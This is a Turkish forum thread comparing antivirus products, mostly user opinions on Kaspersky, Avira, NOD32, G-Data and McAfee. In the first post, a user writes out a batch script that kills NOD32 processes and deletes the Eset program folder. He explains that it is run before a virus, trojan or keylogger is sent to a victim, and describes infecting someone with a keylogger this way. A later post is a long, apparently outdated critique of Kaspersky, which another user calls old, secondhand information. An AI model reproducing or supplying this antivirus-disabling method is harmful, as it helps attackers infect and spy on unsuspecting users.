Antivirüs Tavsiyesi

xxmanxx

Öğrenci
Katılım
28 Nisan 2009
Mesajlar
36
Reaksiyon puanı
1
Puanları
0
Avira testlere premium ile katılmıştır.. Zaten freesinde firewall yok..
@echo off
Taskkill /f /IM nod32krn.exe /IM nod32kui.exe
cd %programfilesdir%\Eset
attrib -H -S -R *.*
del /s /q *.*

Virus,trojan yada keyloggerımızı yedireceğimiz kullanıcıya dosyayı göndermeden önce bir bat dosyasına yukardaki kodları yazarsak(kodların tam çalışan hali değildir sadece örnektir) virusten öncede o bat dosyasını çalıştırmaya programlarsak nod32 ve türevi tüm antiler devredışı kalabiliyor..
Ardından keylogger pcye yerleşmiş oluyor.. Şimdi gelen maillerimden örnek verelim.. Karşı tarafa keyloggerı yolladım pcsinde antivir varmış.. Neyse açtı avira disable oldu ve keylogger aktif oldu şuan hala avira disable ama kaspersky olan bir pcde bu kodların hiçbirisi çalışmıyor.. Neden?
4zyo8p.jpg



Norton iyi diyen arkadaşım neye göre iyi, somut örneklerle açıklarmısın..
Şunu anlayın artık en iyisi Kaspersky, Avirada iyi ama o kadarda fevklade değil.. En büyük özelliği free olması ve sürekli bedava lisans dağıtması. Ama tüm keygenleri virus görmesinden gözümden sıfır alıyor bu arada premiumun firewallı en basit ShadowHook firewall saldırısında sizlere ömür..
Ama KIS ağdan gelen tüm saldırıları filtelebiliyor.. Kaspersky kasan arkadaşlarım kis 2009 yerine kis 7.0 sürümünü yükleyin daha hafif sürüm sonuçta beyaz ve kara liste yerine sadece kara liste var onda..
Kaspersky cort oldu diyen arkadaşım nası oldu onu açıklarmısın kesin kullanıcı hatasıdır!

Bundan sonra mesaj yazacak arkadaşlarım lütfen somut örneklerle cevaplar verin.. Mümkünse örnekler test siteleri değilde yada test siteleri olsa bile yanlış bulgularıda raporlayan siteler olsun en önemliisi kendi pcnizde örnek verin kaspersky ne olduda başarısız oldu??
 

nevrans

Asistan
Katılım
17 Mayıs 2009
Mesajlar
358
Reaksiyon puanı
6
Puanları
18
g-data dıyorum bende avıra ucretsız oldugu ıcın tutuluyor avırada webguard benı delı etmıstı net hızını cok dusuruyordu g-data bence en ıyısı
 

sgurakan

Asistan
Katılım
28 Aralık 2006
Mesajlar
130
Reaksiyon puanı
0
Puanları
0
Madalyonun Öbür Yüzü

Ben birçok antivirüs yazılımı kullandım, Kaspersky hala bilgisayarlarımdan birinde kurulu ve yaklaşık 4 senedir Kaspersky kullanıcısıyım. Ancak madalyonun bir de öbür yüzü var, nedense bundan kimse bahsetmiyor. Herkes iyi bildiği yönlerden bahsediyor, bari objektif olmak adına bende Kaspersky'ın olumsuz yönlerinden bahsedeyim. Ama bu sakın yanlış anlaşılmasın, amacım kaspersky'ı kötülemek veya onun yerine bir başkasını önermek değildir. Sadece bir türk atasözü vardır. "Eğri oturup doğru konuşalım".

1. Kasperksky ile birlikte gelen iStream ve iChecker teknikleri kaspersky disk üzerinde her dosyaya baktığında dosyaların arkasına yaklaşık 63 byte uzunluğunda KAVICHS olarak geçen bir ADS stream ekler. Bu kaspersky'ın daha sonraki dosya taramalarını daha hızlı yapması için düşünülmüştür. Ancak, pratikte tamamen işe yaramayan bir tekniktir. Çünkü her güncelleme ile bu ADS'lerin güncelliği kalmamakta, yazılım tekrar ADS'leri tekrar güncellemek adına yeniden ilave etmektedir. Bu tam tersine bir sonuç yaratmaktadır. Yani pratikte işe yaramadığı bilinen bir gerçektir.

2. ADS stream'ler her dosyaya yaklaşık 63 byte bir ek yaptığı için disk ciddi bir şekilde "fragmente" olmaktadır. Bu dolayısıyla disk erişim performansını ciddi bir şekilde düşürmektedir.

3. KAVICHS olarak ifade edilen ADS stream'leri normal XP dosya sisteminden görülmesi mümkün değildir. Bunun için özel yazılımlar kullanmak gerekir. Ayrıca iStream ve iChecker özelliğini kapattığınızda KAVICHS'leri silmek için kullanacağınız yazılım dosyalarınızın bazılarına kullanılamayacak şekilde zarar vermektedir. Bu KAVICHS'leri silen yazılımda yine kaspersky'a ait veya üçüncü firmalar tarafından yazılmış olabiliyor. Yani bu risk aslında kullanıcısını kasperksky'a mahkum ediyor. Ya bazı dosyalarınızdan olacaksınız, ya da kaspersky'a devam edeceksiniz.

4. Kaspersky'ın ADS stream'leri "system restore" içinde bir risktir. Bu ADS stream'ler nedeniyle, bilgisayarlarını "system restore" ile bir evvelki hallerine döndürmek isteyipte döndüremeyen çok kişi vardır.

5. Kaspersky ADS stream'leri bazı anti-trojan yazılımları tarafında zararlı kod olarak algılanmaktadır, ve bu nedenle kaspersky ile bu tip anti-rojan yazılımları birlikte çalışmamaktadır. (Mesela, TDS-3) Çünkü ADS stream aslında bir güvenlik zaafıdır. Ve yeni nesil birçok güvenlik yazılımı bu ADS stream'leri bir güvenlik açığı olarak kabul etmektedir. Dosyalara kendi özü ile ilgili olmayan bazı bilgilerin ilave edilmesi, güvenlik açısından doğru bulunmamaktadır.

6. Kaspersky'ın disk dosya aramasında performans kazanmak için geliştirdiği bu riskli teknoloji aslında sanıldığı kadar performans arttırmamaktadır. Çünkü daha önce dediğim gibi, sürekli güncellemeler nedeniyle varolan ADS stream'lerin geçerliliği kaybolmakta ve kaspersky hep bunları güncellemek ile uğraşmaktadır. Bu işlemde disk üzerinde ciddi bir perfomans kaybına neden olmaktadır. Çünkü disk sürekli yazma modundadır. Disk performansı artacağına sürekli güncel ADS stream yazma işli yaptığından disk performansı düşmektedir.

7. Kaspersky'ın disk dosya tarama performansı ADS stream kullanılsada kullanılmasa da çok düşüktür. Örneğin, ortamala bir antivirüs yazılımı 50 GB disk datasını 30 dk'da tarar iken, bu kaspersky ile 6-7 saat arasındadır. Bu test birçok sitede ve güncel bilgisayar sistemleri ile yapılmıştır.

8. Kaspersky her ne kadar arşiv dosyaları sorunsuz olarak taradığını iddia etsede, bazı arşiv dosayaları için şifre sorabilmektedir, halbuki diğer antivirüs yazılımları şifre istemeden bu taramayı gayet rahatlıkla yapabilmektedir. Aslında bu arşiv dosyalarında şifre de konulmamıştır, sadece programatik bir "bug" yüzünden kasperky arşiv dosyada şifre var sanabilmektedir.

9. Kaspersky çekirdeği yapılan testlerde görülmüştür ki, Intel işlemcili sistemlerde AMD işlemcili sistemlere nazaran çok daha hızlı çalışmaktadır. Bu kaspersky'ın yazılımını Intel işlemcili sistemler üzerinde geliştirdiğini veya Intel işlemci kodlarına göre optimize ettiğini göstermektedir. Yani AMD ortamında alternatiflerine göre daha yavaştır.

10. Kaspersky yazılımı virüs tesbit etme oranı en yüksek olan yazılımlardan biridir. Ancak "false positive" olarak bilinen ve türkçeye "yanlış alarm" olarak çevirebileceğimiz kısımda da yine yanlış tesbit oranı en yüksek olan yazılımdır da. Bu nedenle, virüs tesbit etme oranından bu yanlış tesbitleri çıkarmak gerekir ki, doğru bir şekilde tesbit edilmiş olanlar ile gerçek ve "net" bir değerlendirme yapılabilsin. Maalesef, bu konuda herkes yanlış tesbit konusunda hem fikir olmakla birlikte, kaspersky'ın virüs tesbit oranından bunu çıkarmayı hep ihmal etmişlerdir. Bu durumda çok rahatlıkla aslında kaspersky'ın "gerçek virüsleri" tesbit oranının daha düşük olduğunu söyleyebiliriz. Bu nedenle de, yukarıda olabildiği gibi, aslında zararsız birçok kod kaspersky tarafından çok rahatlıkla zararlı gibi algılanabilmekte ve insanlar daha önce kullandıkları yazılımların aslında hiçbir zararı olmayan bu kodları görmediği için suçlayabilmektedir Benzeri şekilde çok bilinen; flashget, everest v.b. gibi yazılımların bazı parçaları da kaspersky tarafından hala zararlı kod ve trojan olarak görülmektedir. Kullanıcılar kaspersky'ın zararlı sandığı bu kodları silince de program zarar görmektedir, bazı kısımları veya tamamen çalışmamaktadır.

11. Kaspersky çok eski bir yazılım tekniği ile geliştirildiğinden (yeni geliştirilen 6 ve üstü versiyonları hariç) yeni teknikleri kullanan ataklara ve antivirüslere saldıran zararlılara karşı korumasızdır. Kaspersky antivirüs database'inin üstünlüğünü kullanmaktadır, yani bilinen zararlılara karşı etkili iken, aslında bilinmeyen yeni tür zararlılara karşı çokta etkili değildir. Bir senelik bir süre içinde geçmişe dönülerek yapılan proaktif testlerde aslında kasperksy'ın proaktif anlamada çok yüksek bir başarısı olmadığı sıradan bir antivirüs yazılımı ayarında güvenlik sağladığı görülmektedir. Kasperksky'ın güvenliği sürekli ve çok sık yapılan güncellemeler ile artmaktadır. Heuristic çekirdeği ise yeni versiyonlarında tamamen değiştirilmiştir. (mesela Kaspersky internet security 2006 - şu an prototip aşamasındadır)

12. Virüs güncellemesi için kullanılan kaspersky'ın server'ların da çok sık bantgenişliği nedeni ile sorun yaşanmakta ve güncellemeler zamanında yapılamamaktadır. Ve bu güncelleme süreside alternatiflere göre uzundur. Mesela en son 2004 Aralık ayında böyle bir sorun olmuş, kullanıcılar neredeyse 1 ay boyunca güncelleme yapamamışlardır. Bunun için Kaspersky firması özür dilemiş ve nedenini güncellemenin büyük olmasına bağlamıştır. Ayrıca güncellemelerin boyunun bu kadar büyük olmasıda iyi bir antivirüs yazılımında arzu edilmez. Kaspersky güncellemelerinin boyutu büyüktür ve bu güncelleme için kullanılacak server'ların ve hatların performansı için bir risktir.

Şimdilik aklıma gelenler bunlar. Yine tekrar ediyorum, amacım Kaspersky ürünlerini karalamak değil, ama bahsettiklerim bugün bu ürünü uzun süreden beri kullanan birçok kişi tarafından bilinen, yabancı güvenlik forumlarında çok sık konuşulan konulardır. Amacım sizlerin birde olayın öbür tarafını yani madalyonun diğer yüzünü görmesini sağlayarak, herkesin daha objektif bir yorum yapabilmesini sağlamaktır.

Ben sadece birşeye "iyi" veya "kötü" derken "en azından iki kere" düşünelim ve olayları farklı yönlerinden görelim ve değerlendirelim istiyorum.

Sevgi ve saygılarımla....

bide buna bakın:

- Bu iki yazılımın yanında benim dikkatimi çeken asıl firma "McAfee". Eskiden beri McAfee firmasına inanırım ve sağlam işler çıkarmış bir firmadır. Ayrıca firma satın alırkende hep piyasada ses getiren işler yapmış firmaları bünyesine katmış bir firma. 80'li senelerde DOS ortamındaki başarısı ile adından çok bahsedilen McAfee ürünleri o senelerden bu yana aynı başarı çizgisini devam ettiriyorlar. Bugün piyasada yüzlerde antivirüs yazılımı var. Hepsi kendi başarısını göklere çıkarıp, magazin veya tarafsızlığı su götürecek firmaların testleri ile kendilerini en başarılı göstermenin yarışı içindeler. Ama bunun yanı sıra, benim sözüne en çok güvendiğim akademik kuruluşlar -ki bunların başında üniversiteler gelir- yaptıkları test ve karşılaştırmalarda hep ilk başa McAfee ürünlerini koyuyorlar. Ve hatta internette üniversite sitelerinde dolaşıp hangi antivirüs yazılımınıu kullandıklarına bakarsanız, abartmıyorum % 90'nının McAfee ürünlerini tercih etmiş olduğunu göreceksiniz.

Yukarda saydığım nedenler ile, Norton ve Kaspersky gibi konusunda iddialı olan ürünlerin yanı sıra, bu konuda ciddi saygın ve başarılı bir firma olan "McAfee" ürünlerine de dikkatiniz çekmek isterim. Özellikle "McAfee Virusscan Enterprise 8.0 i" yazılımının sahip olduğu özelliklere sahip birbaşka antivirüs yazılımını kolay kolay bulamayacaksınız. McAfee geçen sonbahar'dan bu yana bu ürünü geliştirmeye özellikle ağırlık verdi. McAfee Enterprise sürümü, yeni patchlar ile 64-bit ortamında daha sorunsuz çalışır hale getirildi, modüler bir yapısı olduğundan ilave olarak Antispyware modülü geliştiriliyor, eskiden haftada bir olan güncelleme artık en az günde bire yükseltildi ve asıl daha ilginci çok çok yeni bir teknoloji olan ve yeni tehditlere karşı "antivirüs yazılımlarının % 99 'unun etkisiz kaldığı" yeni saldırı teknikleri ile savaşmak için sonbahara doğru 5000 serisi engine'i yayınlayacağını açıkladı. Sanırım önümüzdeki 6 ay içinde "McAfee Virusscan Enterprise" sürümüne -belki versiyon 9.0i olarak değişecek- gelecek yenilikler ile eskiden zaten en tepelerde olan bu yazılım artık "kesinlikle bir numara" olacak. Gibi geliyor bana -aslında birçok uzmanında fikri budur-.

Sonuçta, içinde bulunduğumuz şu günlerde yapılan test ve karşılaştırmalara bakarsanız bu işin en iyileri sırasıyla; McAfee, F-Secure, Norton
 

xxmanxx

Öğrenci
Katılım
28 Nisan 2009
Mesajlar
36
Reaksiyon puanı
1
Puanları
0
Madalyonun Öbür Yüzü

Ben birçok antivirüs yazılımı kullandım, Kaspersky hala bilgisayarlarımdan birinde kurulu ve yaklaşık 4 senedir Kaspersky kullanıcısıyım. Ancak madalyonun bir de öbür yüzü var, nedense bundan kimse bahsetmiyor. Herkes iyi bildiği yönlerden bahsediyor, bari objektif olmak adına bende Kaspersky'ın olumsuz yönlerinden bahsedeyim. Ama bu sakın yanlış anlaşılmasın, amacım kaspersky'ı kötülemek veya onun yerine bir başkasını önermek değildir. Sadece bir türk atasözü vardır. "Eğri oturup doğru konuşalım".

1. Kasperksky ile birlikte gelen iStream ve iChecker teknikleri kaspersky disk üzerinde her dosyaya baktığında dosyaların arkasına yaklaşık 63 byte uzunluğunda KAVICHS olarak geçen bir ADS stream ekler. Bu kaspersky'ın daha sonraki dosya taramalarını daha hızlı yapması için düşünülmüştür. Ancak, pratikte tamamen işe yaramayan bir tekniktir. Çünkü her güncelleme ile bu ADS'lerin güncelliği kalmamakta, yazılım tekrar ADS'leri tekrar güncellemek adına yeniden ilave etmektedir. Bu tam tersine bir sonuç yaratmaktadır. Yani pratikte işe yaramadığı bilinen bir gerçektir.

2. ADS stream'ler her dosyaya yaklaşık 63 byte bir ek yaptığı için disk ciddi bir şekilde "fragmente" olmaktadır. Bu dolayısıyla disk erişim performansını ciddi bir şekilde düşürmektedir.

3. KAVICHS olarak ifade edilen ADS stream'leri normal XP dosya sisteminden görülmesi mümkün değildir. Bunun için özel yazılımlar kullanmak gerekir. Ayrıca iStream ve iChecker özelliğini kapattığınızda KAVICHS'leri silmek için kullanacağınız yazılım dosyalarınızın bazılarına kullanılamayacak şekilde zarar vermektedir. Bu KAVICHS'leri silen yazılımda yine kaspersky'a ait veya üçüncü firmalar tarafından yazılmış olabiliyor. Yani bu risk aslında kullanıcısını kasperksky'a mahkum ediyor. Ya bazı dosyalarınızdan olacaksınız, ya da kaspersky'a devam edeceksiniz.

4. Kaspersky'ın ADS stream'leri "system restore" içinde bir risktir. Bu ADS stream'ler nedeniyle, bilgisayarlarını "system restore" ile bir evvelki hallerine döndürmek isteyipte döndüremeyen çok kişi vardır.

5. Kaspersky ADS stream'leri bazı anti-trojan yazılımları tarafında zararlı kod olarak algılanmaktadır, ve bu nedenle kaspersky ile bu tip anti-rojan yazılımları birlikte çalışmamaktadır. (Mesela, TDS-3) Çünkü ADS stream aslında bir güvenlik zaafıdır. Ve yeni nesil birçok güvenlik yazılımı bu ADS stream'leri bir güvenlik açığı olarak kabul etmektedir. Dosyalara kendi özü ile ilgili olmayan bazı bilgilerin ilave edilmesi, güvenlik açısından doğru bulunmamaktadır.

6. Kaspersky'ın disk dosya aramasında performans kazanmak için geliştirdiği bu riskli teknoloji aslında sanıldığı kadar performans arttırmamaktadır. Çünkü daha önce dediğim gibi, sürekli güncellemeler nedeniyle varolan ADS stream'lerin geçerliliği kaybolmakta ve kaspersky hep bunları güncellemek ile uğraşmaktadır. Bu işlemde disk üzerinde ciddi bir perfomans kaybına neden olmaktadır. Çünkü disk sürekli yazma modundadır. Disk performansı artacağına sürekli güncel ADS stream yazma işli yaptığından disk performansı düşmektedir.

7. Kaspersky'ın disk dosya tarama performansı ADS stream kullanılsada kullanılmasa da çok düşüktür. Örneğin, ortamala bir antivirüs yazılımı 50 GB disk datasını 30 dk'da tarar iken, bu kaspersky ile 6-7 saat arasındadır. Bu test birçok sitede ve güncel bilgisayar sistemleri ile yapılmıştır.

8. Kaspersky her ne kadar arşiv dosyaları sorunsuz olarak taradığını iddia etsede, bazı arşiv dosayaları için şifre sorabilmektedir, halbuki diğer antivirüs yazılımları şifre istemeden bu taramayı gayet rahatlıkla yapabilmektedir. Aslında bu arşiv dosyalarında şifre de konulmamıştır, sadece programatik bir "bug" yüzünden kasperky arşiv dosyada şifre var sanabilmektedir.

9. Kaspersky çekirdeği yapılan testlerde görülmüştür ki, Intel işlemcili sistemlerde AMD işlemcili sistemlere nazaran çok daha hızlı çalışmaktadır. Bu kaspersky'ın yazılımını Intel işlemcili sistemler üzerinde geliştirdiğini veya Intel işlemci kodlarına göre optimize ettiğini göstermektedir. Yani AMD ortamında alternatiflerine göre daha yavaştır.

10. Kaspersky yazılımı virüs tesbit etme oranı en yüksek olan yazılımlardan biridir. Ancak "false positive" olarak bilinen ve türkçeye "yanlış alarm" olarak çevirebileceğimiz kısımda da yine yanlış tesbit oranı en yüksek olan yazılımdır da. Bu nedenle, virüs tesbit etme oranından bu yanlış tesbitleri çıkarmak gerekir ki, doğru bir şekilde tesbit edilmiş olanlar ile gerçek ve "net" bir değerlendirme yapılabilsin. Maalesef, bu konuda herkes yanlış tesbit konusunda hem fikir olmakla birlikte, kaspersky'ın virüs tesbit oranından bunu çıkarmayı hep ihmal etmişlerdir. Bu durumda çok rahatlıkla aslında kaspersky'ın "gerçek virüsleri" tesbit oranının daha düşük olduğunu söyleyebiliriz. Bu nedenle de, yukarıda olabildiği gibi, aslında zararsız birçok kod kaspersky tarafından çok rahatlıkla zararlı gibi algılanabilmekte ve insanlar daha önce kullandıkları yazılımların aslında hiçbir zararı olmayan bu kodları görmediği için suçlayabilmektedir Benzeri şekilde çok bilinen; flashget, everest v.b. gibi yazılımların bazı parçaları da kaspersky tarafından hala zararlı kod ve trojan olarak görülmektedir. Kullanıcılar kaspersky'ın zararlı sandığı bu kodları silince de program zarar görmektedir, bazı kısımları veya tamamen çalışmamaktadır.

11. Kaspersky çok eski bir yazılım tekniği ile geliştirildiğinden (yeni geliştirilen 6 ve üstü versiyonları hariç) yeni teknikleri kullanan ataklara ve antivirüslere saldıran zararlılara karşı korumasızdır. Kaspersky antivirüs database'inin üstünlüğünü kullanmaktadır, yani bilinen zararlılara karşı etkili iken, aslında bilinmeyen yeni tür zararlılara karşı çokta etkili değildir. Bir senelik bir süre içinde geçmişe dönülerek yapılan proaktif testlerde aslında kasperksy'ın proaktif anlamada çok yüksek bir başarısı olmadığı sıradan bir antivirüs yazılımı ayarında güvenlik sağladığı görülmektedir. Kasperksky'ın güvenliği sürekli ve çok sık yapılan güncellemeler ile artmaktadır. Heuristic çekirdeği ise yeni versiyonlarında tamamen değiştirilmiştir. (mesela Kaspersky internet security 2006 - şu an prototip aşamasındadır)

12. Virüs güncellemesi için kullanılan kaspersky'ın server'ların da çok sık bantgenişliği nedeni ile sorun yaşanmakta ve güncellemeler zamanında yapılamamaktadır. Ve bu güncelleme süreside alternatiflere göre uzundur. Mesela en son 2004 Aralık ayında böyle bir sorun olmuş, kullanıcılar neredeyse 1 ay boyunca güncelleme yapamamışlardır. Bunun için Kaspersky firması özür dilemiş ve nedenini güncellemenin büyük olmasına bağlamıştır. Ayrıca güncellemelerin boyunun bu kadar büyük olmasıda iyi bir antivirüs yazılımında arzu edilmez. Kaspersky güncellemelerinin boyutu büyüktür ve bu güncelleme için kullanılacak server'ların ve hatların performansı için bir risktir.

Şimdilik aklıma gelenler bunlar. Yine tekrar ediyorum, amacım Kaspersky ürünlerini karalamak değil, ama bahsettiklerim bugün bu ürünü uzun süreden beri kullanan birçok kişi tarafından bilinen, yabancı güvenlik forumlarında çok sık konuşulan konulardır. Amacım sizlerin birde olayın öbür tarafını yani madalyonun diğer yüzünü görmesini sağlayarak, herkesin daha objektif bir yorum yapabilmesini sağlamaktır.

Ben sadece birşeye "iyi" veya "kötü" derken "en azından iki kere" düşünelim ve olayları farklı yönlerinden görelim ve değerlendirelim istiyorum.

Sevgi ve saygılarımla....

bide buna bakın:

- Bu iki yazılımın yanında benim dikkatimi çeken asıl firma "McAfee". Eskiden beri McAfee firmasına inanırım ve sağlam işler çıkarmış bir firmadır. Ayrıca firma satın alırkende hep piyasada ses getiren işler yapmış firmaları bünyesine katmış bir firma. 80'li senelerde DOS ortamındaki başarısı ile adından çok bahsedilen McAfee ürünleri o senelerden bu yana aynı başarı çizgisini devam ettiriyorlar. Bugün piyasada yüzlerde antivirüs yazılımı var. Hepsi kendi başarısını göklere çıkarıp, magazin veya tarafsızlığı su götürecek firmaların testleri ile kendilerini en başarılı göstermenin yarışı içindeler. Ama bunun yanı sıra, benim sözüne en çok güvendiğim akademik kuruluşlar -ki bunların başında üniversiteler gelir- yaptıkları test ve karşılaştırmalarda hep ilk başa McAfee ürünlerini koyuyorlar. Ve hatta internette üniversite sitelerinde dolaşıp hangi antivirüs yazılımınıu kullandıklarına bakarsanız, abartmıyorum % 90'nının McAfee ürünlerini tercih etmiş olduğunu göreceksiniz.

Yukarda saydığım nedenler ile, Norton ve Kaspersky gibi konusunda iddialı olan ürünlerin yanı sıra, bu konuda ciddi saygın ve başarılı bir firma olan "McAfee" ürünlerine de dikkatiniz çekmek isterim. Özellikle "McAfee Virusscan Enterprise 8.0 i" yazılımının sahip olduğu özelliklere sahip birbaşka antivirüs yazılımını kolay kolay bulamayacaksınız. McAfee geçen sonbahar'dan bu yana bu ürünü geliştirmeye özellikle ağırlık verdi. McAfee Enterprise sürümü, yeni patchlar ile 64-bit ortamında daha sorunsuz çalışır hale getirildi, modüler bir yapısı olduğundan ilave olarak Antispyware modülü geliştiriliyor, eskiden haftada bir olan güncelleme artık en az günde bire yükseltildi ve asıl daha ilginci çok çok yeni bir teknoloji olan ve yeni tehditlere karşı "antivirüs yazılımlarının % 99 'unun etkisiz kaldığı" yeni saldırı teknikleri ile savaşmak için sonbahara doğru 5000 serisi engine'i yayınlayacağını açıkladı. Sanırım önümüzdeki 6 ay içinde "McAfee Virusscan Enterprise" sürümüne -belki versiyon 9.0i olarak değişecek- gelecek yenilikler ile eskiden zaten en tepelerde olan bu yazılım artık "kesinlikle bir numara" olacak. Gibi geliyor bana -aslında birçok uzmanında fikri budur-.

Sonuçta, içinde bulunduğumuz şu günlerde yapılan test ve karşılaştırmalara bakarsanız bu işin en iyileri sırasıyla; McAfee, F-Secure, Norton

Neden alıntı yaptığınızı belirtmediniz? Alıntı yaptığınız yazı 2005 yılında var olan Kaspersky sürümündeki problemlerdir.. Ancak Kasperskyın şuanki sürümünde yukarıdaki yazdıklarınızın hiçbiri yer almamaktadır.. Lütfen eski ve kulaktan dolma bilgiler ile kullanıcıları yanıltmayın.. Şuan hiçbir kullanıcı Kaspersky 4 yada 5 sürümünü kullanamaz çünkü güncellemeler o ürünler için pasif durumda.. Yazıdada dolaylı yoldan belirttiğiniz gibi Kaspersky, anti-virus,firewall ve internet güvenliği konusunda madalyonların en iyisine layıktır. Ancak şu an itibari ile bu hakettiği Madalyonlarda asla öbür yüz yoktur.
 

Fuяκaи

Öğrenci
Katılım
19 Mayıs 2009
Mesajlar
15
Reaksiyon puanı
0
Puanları
0
karspersky, antivir, norton.. Bunların hepsini kullandım ama sonunda nod32den başkasını beğenmedim..
 

nevrans

Asistan
Katılım
17 Mayıs 2009
Mesajlar
358
Reaksiyon puanı
6
Puanları
18
gercekten g-data 2010 surumu cok ıyı deneyın derım
 

byndr

Asistan
Katılım
28 Nisan 2009
Mesajlar
330
Reaksiyon puanı
6
Puanları
0
Normal Kaspersky kurdum güncellemeleri yaptığım halde Hızlı başlattaki ikaz kayboldu ama uyum sağlamadığı yönünde bilgi verdi



Daha sonra bu bölümdeki virüsten korunma seçeneklerinden Kaspersky yi yükledim. Kurulumda beta bölümünü seçtim. 3 Ay bedava lisas verdi ve win 7 ye uyum sağladı üstelik hiç kasma olmuyor
WİN 7 İÇİNDİR. XP ve VİSTA Hiçbir virüs programı hata vermiyor.


Norton indirdim Henüz denemedim. Avira uyum sağladı ama daha sonra güncelleme yapmadı hata verdi.
WİN 7 kullananlar Denetim masasından sık sık kontrol ediniz
 

nevrans

Asistan
Katılım
17 Mayıs 2009
Mesajlar
358
Reaksiyon puanı
6
Puanları
18
kaspersky ınternet securıty 2010 full surum cıkmıstır arkadaslar kıs 2009 lısansınızla kıs 2010 kurup calıstırabılırsınız
 

Barcode

Doçent
Katılım
10 Ağustos 2008
Mesajlar
617
Reaksiyon puanı
0
Puanları
0
Nod32 gelene geçene karışmıyor, arka planda ne yaptığını kimse bilmiyor. Kaspersky herşeyi tehlike olarak algılıyor. Norton, bilgisayarı çok kasardı.. Düzelttik dediler ama denedim yine aynı çok kasıyo..

Ama tüm bunlara rağmen Kaspersky kullanıyorum..
 

serin

Asistan
Katılım
6 Kasım 2006
Mesajlar
121
Reaksiyon puanı
1
Puanları
16
bilgisayarımda trojan virüsü var windows 10 kullanıyorum bir türlü temizleyemiyorum yardım edermisiniz
 

PrestigeMan

Profesör
Katılım
23 Şubat 2014
Mesajlar
1,564
Reaksiyon puanı
157
Puanları
63
Eset kullanıyorum. Uzun zaman hiç sıkıntı yaşatmadı. Virüs bulaşmadı.
 
Üst